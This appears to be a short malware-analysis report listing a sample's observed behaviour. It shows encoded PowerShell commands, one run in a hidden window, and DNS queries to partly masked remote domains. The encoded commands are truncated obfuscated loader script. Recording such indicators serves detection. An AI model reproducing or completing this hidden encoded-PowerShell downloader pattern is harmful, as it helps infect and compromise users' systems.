Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUwB3AGkAeAB5AGgAYgBiAGkAdgBnAGgAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASwBtAGsAdwBtAGkAZABzAHUAIAAjAD4AIAAkAEwAeQBwAGgAdABtAGsAcgA9ACcAUABmAHIAeA...
- DNS ASK ma###panda.com
- DNS ASK de#.###e-experts.com
- DNS ASK wp.####isionbrush.com
- DNS ASK de#.##rnflake.com
- DNS ASK za##m.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUwB3AGkAeAB5AGgAYgBiAGkAdgBnAGgAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASwBtAGsAdwBtAGkAZABzAHUAIAAjAD4AIAAkAEwAeQBwAGgAdABtAGsAcgA9ACcAUABmAHIAeA...' (with hidden window)